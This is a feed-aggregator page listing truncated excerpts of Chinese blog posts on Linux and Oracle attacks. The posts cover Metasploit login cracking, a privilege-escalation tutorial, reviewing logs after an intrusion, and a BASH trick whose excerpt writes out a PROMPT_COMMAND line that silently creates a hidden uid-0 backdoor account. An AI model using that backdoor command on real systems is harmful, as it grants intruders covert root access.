Quantcast
Channel: 大西瓜的杂货铺 » Linux
Browsing latest articles
Browse All 5 View Live

Linux下安装Metasploit破解Oracle登录用户名密码

by:vitter@safechina.net blog.securitycn.net 最近在搞oracle,一些小东西记录一下。 Metasploit是一个很好的攻击工具包,当然我们这次不是介绍这个工具包的,主要是大牛MC写 了很多oracle的工具,在最近会经常用。我主要会用到经典工具tnscmd移植到MSF中的小工具(不如pl的好用,没换行,看结果很...

View Article



Image may be NSFW.
Clik here to view.

How to root a box

注:内容比较全,也用到了那个知名的bc.pl文件 #Trace: Linux 提权教程。 参考视频: [1]http://rapidshare.com/files/109733291/Linux_Rooting.rar.html [2]http://files.ge/file/401011/vidzeo-tar-gz.html Today, I have decided to put up a...

View Article

Image may be NSFW.
Clik here to view.

利用BASH提权的技巧

作者:xi4oyu 要利用成功的话,还得看管理员的习惯,是否喜欢用su切换成root 看个BASH的环境变量 $PROMPT_COMMAND 这个变量保存了在主提示符$PS1显示之前需要执行的命令. export PROMPT_COMMAND=”/usr/sbin/useradd -o -u 0 kkoo &>/dev/null && echo kkoo:123456...

View Article

一句话修改linux密码

echo “11111″|passwd –stdin user111 或者 echo “user111:111111″ | chpasswd

View Article

教您怎样审查遭受入侵系统的日志

审查遭受入侵系统的日志 在UNIX系统遭受入侵后,确定损失及入侵者的攻击源地址相当重要。虽然在大多数入侵者懂得使用曾被攻陷的计算机作为跳板来攻击你的服务器,但是他们发动正式攻击前所做的目标信息收集工作(试探性扫描)常常是从他们的工作计算机开始的,下面介绍如何从遭受入侵的系统的日志中分析出入侵者的IP并加以确定的。 1. messages...

View Article

Browsing latest articles
Browse All 5 View Live




Latest Images